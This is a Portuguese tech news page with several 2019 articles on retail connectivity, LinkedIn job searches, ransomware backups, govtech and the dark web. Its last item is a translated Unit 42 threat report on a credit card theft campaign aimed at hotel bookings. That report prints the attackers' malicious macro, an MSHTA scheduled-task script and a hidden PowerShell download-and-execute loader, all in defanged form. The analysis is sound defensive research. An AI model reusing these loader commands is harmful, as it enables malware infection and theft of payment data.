Conectividade: o elo entre o mundo físico e o digital

web_gestor.jpg*Por Ricardo Pinho
22/04/2019 - Entregar ao consumidor o que ele precisa, onde ele estiver e quando ele quiser é um discurso bastante disseminado em qualquer mercado. Na maioria das vezes, ele representa a integração do online com o offline, mesmo que não seja uma tarefa fácil de se colocar em prática.

Quando se trata do varejo, então, esse desafio, muitas vezes, parece até mesmo impossível. Porém, nesse caso, existe um ponto que une os mundos físico e digital: a conectividade. Ela é o elo que permite que todas as operações independentemente do meio, compartilhem vantagens como coleta de dados e gestão total do relacionamento com o cliente, deixando de ser uma questão física e passando a ser a infraestrutura básica para trazer a experiência do e-commerce para o mundo offline e vice-versa.

Até algum tempo atrás, as soluções de conectividade para uma loja física levavam em conta apenas as necessidades de operação (internet para passar o cartão de crédito, troca de e-mails, atualização do ERP). Hoje, estas soluções vão muito mais além. Para garantir a satisfação do cliente, é preciso oferecer uma experiência completa, que vai da internet liberada para sua navegação até o checkout móvel, por exemplo. E, com o aumento do tráfego, é preciso também estar atento a questões de segurança e qualidade da operação.

Uma análise apressada desse cenário pode indicar que o varejista precisa gastar mais com itens como banda, roteador, fibra, cabos. Mas isso não é necessariamente verdade. Com uma infraestrutura inteligente, é possível aumentar a capacidade instalada, garantir a segurança, implementar uma base Big Data e, tudo isso, sem estourar os custos.

Combinando hardware e software de forma racional, é possível montar uma rede interna capaz de atender a todas as necessidades de cada operação. Quem precisa de reserva de banda para determinada tarefa (como passar cartão ou acessar o ERP) pode usar um sistema de balanceamento capaz de organizar o tráfego minuto a minuto.

Já quando falamos em segurança, é preciso estar atento à nova legislação, que responsabiliza civilmente quem responde pela rede por todos os dados que trafegam por ela. Para evitar riscos futuros, existem inúmeros softwares que limitam o acesso a sites e aplicativos duvidosos.

Mas a grande vantagem das redes inteligentes é a possibilidade de montar um "radar dos clientes". Com ferramentas de captura e análise dos dados trocados na rede, fica fácil conhecer em profundidade quem visita a loja física, identificando necessidades não percebidas e tendências de compra. Com isso, é possível planejar promoções e até mesmo campanhas personalizadas, algo que, até pouco tempo, só era possível no digital. Tudo, claro, sempre com a autorização do consumidor, tomando todos os cuidados com a privacidade.

Ou seja, a tecnologia chega ao varejo físico, proporcionando independência e flexibilidade no gerenciamento de dados e uma grande conexão com os clientes. Tudo isso de modo muito fácil e a custos acessíveis. Esse é o futuro. E o futuro é hoje.

*Ricardo Pinho é Diretor Executivo de Conectividade da Linx

Comentário (0) Hits: 27

Saiba como procurar emprego no LinkedIn

job.jpg*Por Bia Nóbrega
22/04/2019 - O LinkedIn é uma rede social voltada para o mundo dos negócios que além de te possibilitar manter contato com amigos de trabalho, conta com uma ferramenta de busca de vagas muito eficiente. O que pode ser feito tanto na opção tradicional gratuita, quando na opção Premium que é paga.

No perfil, há a opção de Vagas. A partir dela, vá em interesse de carreira, onde você iniciará seu processo de candidatura. Inclua seu status de disponibilidade, que terá opções como em busca ativamente ou ocasionalmente e aberto ou não para ofertas. Isso ajuda bastante os recrutadores porque essas informações ficam disponíveis para eles, separadas pelas opções.

Depois, preencha o campo de cargo de interesse, então pense justamente no que você almeja para sua carreira nessa hora. Também tem a opção de incluir a localidade para as oportunidades de emprego, onde você pode selecionar países, estados, cidades e regiões.

Outra questão importante é a possibilidade de incluir suas preferências de distância entre a sua residência e o trabalho, disponibilidade para trabalhos remotos, tipos de vagas que te interessam, quais setores você prefere e em que tamanho de empresa você quer trabalhar.

Não se esqueça de ativar o botão que irá informar aos recrutadores o seu interesse por novas oportunidades, que fica disponível no topo da tela, além de incluir uma mensagem para eles.

Feito isso, hora de pesquisar as vagas! Clique na opção "acompanhar minhas vagas", onde ficarão disponíveis oportunidades que você já tenha se candidatado. Nesse campo, também é possível buscar novas vagas, a partir da posição que você quer estar. É bacana deixar o alerta ativado para receber notificações ou e-mails de vagas novas na frequência que você decidir, diariamente ou semanalmente.

Se for possível, ative o LinkedIn Premium, que fica disponível de forma gratuita por um mês de experiência, pois ele te mostrará informações que aumentam sua competitividade, além de te deixar com maior destaque no processo de seleção. Dentro desse formato existem alguns planos com características diferentes direcionados para perfis profissionais, veja com qual você se identifica mais.

Com o LinkedIn Premium, você tem acesso a dados sobre a vaga que não ficam à mostra para a conta tradicional. Como, por exemplo, uma média do seu perfil em relação aos outros candidatos, possibilitando que você tenha uma ideia da sua posição em determinada vaga e quais competências suas se encaixam nas necessárias, desenvolvendo assim uma inteligência competitiva.

Seja na Premium ou na conta básica gratuita, o LinkedIn é uma ótima área para se encontrar novas oportunidades e manter relações com pessoas que você tenha encontrado ao longo de sua carreira, por isso aproveite!

*Bia Nóbrega é coach, mentora, palestrante e atua há mais de 20 anos na Área de Recursos Humanos em empresas líderes em seus setores.

Comentário (0) Hits: 33

Backup, um aliado-chave contra o ransomware

eset_ransonware.jpg02/04/2019 - Perder informações valiosas é uma das principais consequências que prejudicam uma empresa ou um indivíduo que foi vítima de um ransomware. A ESET destaca a importância de fazer backups periódicos das informações como uma estratégia preventiva contra um possível ataque de ransomware, bem como outros possíveis incidentes de segurança, e apresenta os resultados de uma pesquisa feita à sua comunidade de usuários e executivos de mais de 15 países da América Latina.

Na América Latina, os países com o maior número de detecções de ransomware no último ano foram Colômbia, Peru e México, enquanto globalmente os Estados Unidos e a Rússia lideram o ranking. Por outro lado, no relatório Tendências 2019, especialistas da ESET apontam que o objetivo dos cibercriminosos é direcionar campanhas de ransomware para um pequeno grupo de vítimas, que são altamente lucrativas, em vez de campanhas de spam maliciosos em busca de um grande volume de vítimas, cada uma gerando uma pequena retribuição econômica.

Para obter conhecimento em primeira mão das experiências dos usuários, a ESET desenvolveu uma pesquisa com sua comunidade e executivos, técnicos e gerentes de negócios de mais de 15 países da região. Entre os dados mais relevantes, temos a informação de que 29% dos participantes afirmaram ter sido vítimas de algum tipo de ransomware e que 70% desse percentual perderam informações, dinheiro ou ambos como resultado de um ataque desse tipo de malware. Nesse sentido, 93% das vítimas de ransomware afirmaram ter mudado de opinião quanto à importância do backup de informações.

Enquanto os pesquisadores de segurança recomendam nunca pagar pelo resgate das informações sequestradas, uma vez que incentiva o mercado e não garante que os cibercriminosos realmente descriptografem os arquivos quando pagam, 1 em cada 4 dos entrevistados disseram que pagariam um resgate na tentativa de recuperar as informações de criptografia.

Por outro lado, 60% dos entrevistados disseram conhecer alguém que foi vítima de ransomware e quase um terço desse percentual conhece empresas que foram afetadas por essa ameaça. Nessa mesma linha, 81% dos entrevistados disseram que ficariam preocupados se soubessem que a empresa em quem confiam suas informações não tem uma solução de backup.

"O backup é a melhor opção para responder a um incidente de segurança, pois permite recuperar informações valiosas no caso de um possível ataque de ransomware e também de outros tipos de computador e até mesmo ameaças físicas. No entanto, nem todos dão a devida importância. Dados do ESET Security Report 2018 mostraram que no México, por exemplo, apenas 50% das empresas tinham uma solução de backup, e dados mais recentes em nível regional mostram que 37% das empresas com um perfil corporativo não têm uma solução de backup", comenta Camilo Gutierrez, Chefe do Laboratório da ESET América Latina.

Comentário (0) Hits: 373

Que é govtech e que vantagens oferece ao cidadão

web_lei.jpg*Por Jaison Niehues
26/03/2019 - Não é exagero dizer que o avanço da tecnologia ao longo dos últimos anos transformou o mundo e remodelou setores inteiros da economia. O mercado financeiro, por exemplo, deixou de ser centrado nos bancos e viu a consolidação das fintechs. O sistema educacional também mudou com o advento das edtechs e a área de saúde se prepara para o crescimento das healthtechs. Entre tantos acrônimos, um deles se destaca justamente por trazer eficiência e agilidade a um segmento conhecido pela burocracia e falta de transparência: o poder público. As govtechs já são uma realidade e oferecem diversas vantagens aos servidores e também aos cidadãos.

A pesquisa TIC Governo Eletrônico, conduzida por CGI.br (Comitê Gestor da Internet no Brasil) mostra que, aos poucos, as prefeituras brasileiras começam a adotar soluções de tecnologia da informação. Pouco mais da metade delas já possui algum recurso para a gestão de documentos (54%) e para o andamento dos processos (56%). Quase um terço do total (31%) já investe em um software de gestão integrada, otimizando o dia a dia dos servidores públicos e trazendo rapidez a todos os trâmites.

Da mesma forma que os outros exemplos já citados, a tecnologia voltada ao poder público deve ser pautada pela transformação digital que ocorre atualmente em todo o mundo. As soluções pensadas e desenvolvidas para este segmento devem priorizar a resolução de problemas reais dos cidadãos, como a burocracia nos processos internos e a demora na resposta de solicitações feitas. Além disso, é importante estimular o uso de equipamentos de fácil implementação e, principalmente, prezar pela transparência necessária a todos os órgãos federais, estaduais e municipais.

Quando se tem parceiros que auxiliam na implementação destas tecnologias, o poder público consegue atingir a tão desejada eficiência em seus trâmites. Afinal, se todos os documentos são digitalizados e ficam disponíveis às pessoas na web, se gabinetes e secretarias conseguem ter uma visão ampla de todo o processo, identificando em qual departamento está a solicitação e qual o profissional responsável, os gestores podem avaliar cada área de acordo com seu desempenho, apontando melhorias para aumentar a produtividade e melhorar os índices de satisfação da população.

Ainda hoje os órgãos públicos são vistos como sinônimos de burocracia e até de preguiça. Por muito tempo, solicitar um atendimento em governos municipais, estaduais ou até na União era uma via-sacra: a pessoa tinha que visitar diferentes departamentos e secretarias, acumular uma série de papéis e esperar todo o trâmite até ter sua solicitação atendida – um procedimento que costumava levar meses. Essa insatisfação aumentou com a evolução da tecnologia nas últimas décadas. Se tudo foi agilizado e ficou mais rápido, por que o poder público não pode ser ágil também?

Hoje não há mais espaço para prefeituras, secretarias e autarquias continuarem utilizando sistemas burocráticos e pouco efetivos no atendimento às demandas dos cidadãos. A tecnologia mostrou às pessoas que é possível desburocratizar, agilizar e ser mais transparente. Órgãos públicos que não se adaptarem a esta nova realidade terão sérias dificuldades no relacionamento com a população – e poderão até perder verbas por conta disso. O futuro já chegou ao governo e é totalmente tech.

*Jaison Niehues é fundador da 1Doc, plataforma web de comunicação, atendimento e gestão documental para órgãos públicos

Comentário (0) Hits: 493

Diferenças entre Surface Web, Deep Web e Dark Web

deep_web2.jpg25/03/2019 - Nas últimas semanas falou-se muito sobre Surface Web e Deep Web, principalmente por causa das tragédias em Suzano e na Nova Zelândia. Além disso, os assassinos frequentavam fóruns na internet antes da tragédias acontecerem.

É na Dark Web que surgiu boa parte dos sites de venda de drogas, armas, pedofilia e fóruns radicais, mas vale ressaltar que a Dark Web também é frequentada por usuários que precisam de um refúgio para debates sem censura, em países autoritários que controlam a internet.

Para entender melhor como funciona a Surface Web, Deep Web e Dark Web, entrevistamos o especialista Leonardo Dias, que respondeu a algumas perguntas, que seguem abaixo:

Como surgiu a Deep Web?

A Deep Web surgiu da necessidade de uma busca pelo anonimato na internet. Na rede, todo mundo tem um IP e usa esse IP para navegar. Isso retira a possibilidade de anonimato. Redes como o "TOR" surgiram para possibilitar esse anonimato. Por meio de um sistema similar à uma rede privada virtual (VPN), usuários navegam com IPs de outros usuários que acessam a deep web, muitas vezes em outros países. Dessa forma, tudo o que é acessado é feito por outros IPs, possibilitando o anonimato.

O termo Deep Web se refere à parte das informações que estão na internet que não são indexadas pelos buscadores da rede, como o Google. São servidores que manuseiam dados que não aparecem em buscas, por mais detalhadas que sejam. A razão para isso não é necessariamente maliciosa na maioria dos casos. O Facebook é um bom exemplo, pois boa parte de seu conteúdo é protegido por senha, portanto não é acessível pelo buscador e não é indexado. O mesmo vale para mensagens, e-mails e arquivos na nuvem.

Principais diferenças entre Deep Web e Surface Web

Deep Web, por ter essa característica de anonimato, se tornou o ambiente para troca de informações sigilosas em geral. Surface Web é a web tradicional, com os sites principais, e-commerces e serviços online que conhecemos como por exemplo Google, Wikipedia e Bing.

Um usuário comum consegue acessar a Deep Web?

Quando foi criada era bem mais complicado. Hoje existem aplicações para smartphones que conseguem utilizar esses sistemas como se fossem navegadores, bem como utilizar o sistema como uma VPN.

Existe a possibilidade de se monitorar a Deep Web?

Existe, sim. E inclusive muita gente já foi presa por crimes na Deep Web. É possível também que empresas de cartão de crédito por exemplo, realizem um monitoramento em busca de cartões roubados expostos na deep web. É possível fazer isso por meio de um rastreamento dos principais fóruns da deep web, como Reddit, da internet tradicional.

O WikiLeaks navega na Dark Web?

Qualquer site pode ser acessado por meio de navegadores dessa rede "TOR". Existem buscadores como o Google e serviços de informação similar ao WikiLeaks. No fundo, é uma cópia mal feita da web tradicional.

Como funciona o monitoramento?

É possível monitorar grupos que defendem ideologias criminosas de ódio e extremistas, links de fóruns que divulgam cartões roubados, e gerar um sistema anti-fraude baseado nisso. Além disso, é possível monitorar as mensagens em fóruns conhecidos e acompanhar mensagens sobre atividades fraudulentas, levando ao monitoramento daquelas pessoas

Mesmo sendo uma rede que oferece um anonimato, você sempre acessa com um IP. Se esse IP está num país acionável juridicamente, é possível fazer o caminho de volta desse acesso, possibilitando encontrar criminosos dessa rede. Para realizar esse rastreamento, é necessário processar dum grande volume de dados para encontrar as informações necessárias junto a empresas de telecomunicações, por exemplo. Nem todo mundo possui recursos de análise para fazer esse caminho reverso, no entanto é possível encontrar IPs com comportamento específico por meio de padrões, utilizando ferramentas modernas de busca e de inteligência artificial e encontrar os caminhos. Pode ser necessário falar com provedores de outros países para encontrar a origem final do acesso. Não é impossível e, dependendo do caminho da rede que a pessoa se encontra, ela pode ser facilmente detectada.

Empresas do ramo financeiro também podem se beneficiar do monitoramento da Deep Web para encontrar dados roubados e antecipar-se a crimes que poderiam ser cometidos com esses dados. Para tanto é necessário contar com o apoio de empresas que fazem análise de dados utilizando machine learning e outras tecnologias.

Existe a possibilidade de se monitorar a Dark Web?

É possível também monitorar grupos crimonosos, os que defendem ideologias de ódio e extremistas e obter informações da mesma maneira que foi citada acima.

*Leonardo Dias é CDO e cofundador da Semantix, empresa especializada em Big Data, Inteligência Artificial, Internet das Coisas e Análise de dados.

Comentário (0) Hits: 546

Como hackers executaram um negócio barato

cartao_shutterstock2.jpg15/03/2019 - *Esta é uma publicação do blog da Unit 42, unidade de pesquisa da Palo Alto Networks. Para análise completa, visite o link (em inglês):
Em dezembro de 2018, os pesquisadores da Unit 42 da Palo Alto Networks identificaram uma campanha em andamento com um forte foco no setor de hospitalidade, especificamente em reservas de hotéis. Embora nossa análise inicial não mostrasse nenhuma técnica nova ou avançada, observamos forte persistência durante a campanha que desencadeou nossa curiosidade.

Seguimos os rastros de rede e nos baseamos nas informações deixadas por esse indivíduo, como diretórios abertos, metadados de documentos e peculiaridades binárias, que nos permitiram encontrar um malware feito sob medida, que chamamos de "CapturaTela". Nossa descoberta desta família de malware mostra o motivo do foco persistente nas reservas de hotéis como um vetor principal: roubar informações de cartão de crédito dos clientes.

Analisamos estas ameaças e isso resultou na descoberta não apenas de seus mecanismos de entrega, mas também de seu arsenal de ferramentas de acesso remoto e trojans de roubo de informações, ambos adquiridos em fóruns clandestinos e em ferramentas de código aberto encontradas nos repositórios do GitHub.

Alguma vez você já se perguntou como uma pessoa pode administrar um negócio underground de dados de cartão de crédito muito barato e eficaz? Bem-vindo à "Operação Comando".

Mecanismos de entrega de malware do atacante

Nossa telemetria para essa campanha identificou o e-mail como o principal mecanismo de entrega de malware e descobriu que as primeiras amostras relacionadas foram distribuídas em agosto de 2018. Os tópicos usados pelo ator geralmente estão relacionados a reservas de viagem e vouchers e têm como alvo principalmente vítimas brasileiras. A Tabela 1 mostra uma lista representativa de assuntos típicos e nomes de anexos encontrados durante a campanha.


Tabela 1 Alguns assuntos de e-mail e nomes de anexos representativos desta campanha

Ao investigar os documentos maliciosos usados na campanha, descobrimos uma consistência interessante nos metadados do documento. O autor utiliza consistentemente um acrônimo durante todo o trabalho - "Original C.D.T" (veja detalhes na Figura 1).

Figura 1 Exemplo de metadados de documentos maliciosos

Os invasores fazem uso de vários métodos comuns, de prateleira, que são observados em muitas campanhas, como referências externas a scripts remotos executados pelo MSHTA (executável do Windows – malwares podem se disfarçar deste arquivo legitimo). Seguindo essa abordagem, esse ator pode encontrar várias ferramentas e recursos para executar suas atividades e, ao mesmo tempo, dificultar a atribuição e o rastreamento para os analistas.

Como exemplo de uma entrega de e-mail usada durante as campanhas de dezembro de 2018, vamos ver o que pretendia ser uma lista de alojamento (SHA256: ac70d15106cc368c571c3969c456778b494d62c5319dc366b7e2c116834c6187).

Os documentos maliciosos contêm uma macro simples, que executa um script hospedado remotamente usando MSHTA:

Public Sub Auto_Open()

var0 = "MSHTA http://bit[.]ly/2QXNTHi"

Var = var0

Shell (Var)

End Sub

O URL de destino: hxxps://internetexplorer200[.]blogspot[.]com/

As estatísticas do link encurtado por URL em bit.ly confirmam as observações de nossa telemetria, mostrando as metas principalmente no Brasil, conforme ilustrado na Figura 4.

Figura 4 Distribuição da campanha Bit.ly nos dias 27 e 28 de dezembro

O MSHTA executa conteúdos VBScript que são codificados / ofuscados usando um algoritmo muito simples (observe a presença de palavras em português em todo o código).

Código VBScript de primeiro estágio executado via MSHTA

Isso resulta na seguinte tarefa agendada criada no sistema, em que um novo script de segundo estágio é invocado via MSHTA a partir de outro local remoto. Observe que o código VB do segundo estágio contém uma referência a "CDT" em um comentário.

"set shhh = CreateObject(\"WScript.Shell\")\r\n Dim var1\r\n var1 = \"cmd.exe /c SchTasks /Create /sc MINUTE /MO 240 /TN AdobeUpdateSD /TR \"\".exe http://minhacasaminhavidacdt.blogspot[.]com/\"\r\nshhh.run var1, vbHide\r\n"

Script VB de segundo estágio

Esse código VBScript de segundo estágio acaba carregando uma carga útil final na memória por meio do reflexo do PowerShell, buscando o conteúdo binário de um arquivo com uma extensão GIF:

"CreateObject(\"Wscript.Shell\").run \"cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [Reflection.Assembly]::Load([Convert]::FromBase64String((New-Object Net.WebClient).DownloadString ('http://achoteis.com[.]br/images/64.gif'

))).EntryPoint.Invoke($null,$null)\"\r\n"

O payload final entregue neste caso é o RAME (Revenge Remote Access Trojan), uma ferramenta de commodity que pode ser usada para facilitar o roubo de informações.

Análise de Infraestrutura

No nível da infraestrutura, o invasor faz uso de serviços dinâmicos de DNS (DDNS), como DuckDNS, WinCo ou No-IP, muitos dos quais oferecem contas gratuitas diminuindo o investimento necessário para a infraestrutura do invasor. Alguns exemplos dos domínios em uso são detalhados na Tabela 2.

Dominios de DNS Dinâmicos

systenfailued.ddns[.]com[.]br

office365update[.]duckdns[.]org

cdtoriginal[.]ddns[.]net

Exemplos de domínios associados a essa campanha usando provedores de DDNS

Além de usar serviços gratuitos, colar sites e uso de sites comprometidos, também identificamos pelo menos um domínio que parece ser de propriedade de ator. O domínio "fejalconstrucoes [.] Com [.] Br" tem sido usado para hospedar cargas úteis, bem como enviar e-mails para vítimas em potencial. Figura 7 O registro DNS WHOIS mostra detalhes sobre o domínio, que foi registrado usando o serviço UOL no Brasil.

Figura 7 Registro do DNS WHOIS

Os e-mails com anexos maliciosos pertencentes a esta campanha foram encontrados com as seguintes características:

Domain: fejalconstrucoes[.]com[.]br

Email Senders: O endereço de e-mail address está sendo protegido de spambots. Você precisa ativar o JavaScript enabled para vê-lo., O endereço de e-mail address está sendo protegido de spambots. Você precisa ativar o JavaScript enabled para vê-lo.

Attachment names: Contrato Anual FEJAL Construçoes.ppa

Como mencionado anteriormente, um detalhe interessante em domínios e caminhos usados pelo invasor é o uso do acrônimo recorrente "CDT", como por exemplo:

hxxp://bit[.]ly/cdtqueda

hxxp://cdtoriginal.ddns[.]net

Identificando o driver principal do negócio: "CapturaTela"

Durante nossa investigação, um diretório aberto identificado nos permitiu encontrar várias cargas úteis usadas pelo invasor. Abaixo o conjunto de cargas e documentos encontrados. O acrônimo "CDT" continua aparecendo mesmo nos nomes de arquivos.

Conteúdo encontrado em um diretório aberto no cdtmaster [.] Com [.] Br

Apesar do nome do arquivo, "quasar.jse" não é QuasarRAT, mas sim um script JS que contém um dropper de payload codificado em base64, com uma carga útil muito simples e interessante para nossa investigação.

Dropper de payload de base64 JS

A carga decodificada é um arquivo PE, escrito em .NET, com recursos de roubo de informações. Um de seus principais métodos dá nome à nossa família de malware "CapturaTela" e, como seu nome em português indica, tem a capacidade de salvar uma captura de tela em um objeto Bitmap.

CapturaTela method's screen capture capabilities.

A principal funcionalidade deste trojan de roubo de informações é a seguinte

- Iterar sobre a lista de processos abertos e verificar títulos de janela específicos. O título deve conter "ls. B" ou "o. B" para a amostra realizar outra atividade.

- Se o título for encontrado, uma captura de tela será tirada e enviada por e-mail como um anexo JPEG.

- Ele eliminará os processos existentes do Chrome quando concluído. Os títulos das janelas provavelmente se baseiam no conteúdo das tags do Chrome.

Recursos de exfiltração de e-mail do CapturaTela

Para validar a funcionalidade, decidimos criar uma página da Web simples que correspondesse ao conteúdo do título e corrigimos a amostra mal-intencionada para usar uma conta de e-mail de teste sob nosso controle.

Testar página HTML e depurar a funcionalidade do CapturaTela. Como resultado, confirmamos o formato e o conteúdo das informações exfiltradas que o atacante planejava coletar de suas vítimas.

E-mail recebido com dados exfiltrados

Então, a única questão que restava para nossa investigação era o tipo de conteúdo e títulos de janela que esse trojan de roubo de informações estava procurando? Quais tipos de páginas da Web podem conter "ls · B" ou "o · B" como parte de seu título?

Inicialmente, encontrar um site com essas propriedades parecia ser uma tarefa impossível, mas começamos a pesquisa com base no que sabíamos sobre os metadados de segmentação e envio de e-mails usados nessas campanhas. Com esses dados, pudemos identificar possíveis websites de destino contendo determinados termos, mas comuns ao setor e à natureza da empresa, nos títulos das páginas dos sites, em inglês e português, que correspondessem à correspondência de padrões de string descrita acima e invoque os recursos de roubo de cartões de crédito do malware. Os websites encontrados nos levam ao fato de que o foco do invasor é obter os detalhes completos do cartão de crédito da vítima durante um determinado processo de compra.

Depois de analisar várias amostras do CapturaTela e extrair o conteúdo da parte de configuração do e-mail, várias sequências interessantes foram encontradas.

Interesting strings

Comando30

Comando30@cdt

comando50

Strings interessantes em configurações de email

O uso contínuo do acrônimo "CDT" e a presença da palavra "Comando", que poderíamos associar à primeira letra, nos levaram a escolher a "Operação Comando" para descrever essa campanha.

Uso extensivo de Trojans de Acesso Remoto

Além do uso do trojan personalizado CapturaTela, o ator faz uso extensivo de vários outros trojans de acesso remoto para executar suas atividades maliciosas. As seguintes famílias do RAT foram observadas durante a campanha do ator.

- RAT Family

- LimeRAT

- RevengeRAT

- NjRAT

- AsyncRAT

- NanoCoreRAT

- RemcosRAT

Tabela 5 Principais famílias de RAT observadas nesta campanha

O uso extensivo dessas ferramentas de RAT potencialmente aumenta os objetivos de negócios, dada a quantidade de informações que o ator pode obter sobre os resultados de compra de cartão de crédito roubados dos sites-alvo por meio de vítimas infectadas.

Existem vários exemplos de famílias RAT usadas que podem ser encontradas no GitHub, como:

http://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp

http://github.com/NYAN-x-CAT/Lime-RAT

Sobrepõe-se a outras pesquisas publicadas

Alguns dos domínios e amostras encontrados nesta investigação já foram pesquisados e relatados por Yoroi. Com base nos detalhes de nossa pesquisa, acreditamos que, apesar de algumas pequenas sobreposições nas técnicas utilizadas, essa campanha não está relacionada ao Gorgon Group.

Conclusões

A Operação Comando é uma campanha de cibercrime puro, possivelmente de origem brasileira, com um foco concreto e persistente no setor hoteleiro, que comprova como um agente de ameaça pode ser bem-sucedido na busca de seus objetivos, mantendo um orçamento baixo. O uso de serviços DDNS, ferramentas de acesso remoto disponíveis publicamente e ter um conhecimento mínimo sobre desenvolvimento de software (neste caso, VB.NET) foi suficiente para executar uma campanha com duração de um mês e coletar potencialmente informações de cartão de crédito e outros dados.

Enquanto campanhas de cibercrime como essa permanecem ativas, os clientes da Palo Alto Networks estão protegidos contra essas ameaças das seguintes maneiras:

- WildFire detecta todos os documentos maliciosos e payloads entregues como malware.
- Clientes do AutoFocus podem acompanhar esta campanha usando a seguinte tag
- TRAPS bloqueia todos os arquivos associados a essa campanha.

A Palo Alto Networks compartilhou nossas descobertas, incluindo amostras de arquivos e indicadores de comprometimento, neste relatório com nossos colegas membros da Cyber Threat Alliance. Os membros da CTA usam essa inteligência para implantar rapidamente proteções para seus clientes e para interromper sistematicamente os cibercriminosos. Para mais informações sobre a Cyber Threat Alliance, visite cyberthreatalliance.org

Crédito: Imagem cartões / Shutterstock

Comentário (0) Hits: 746

newsletter buton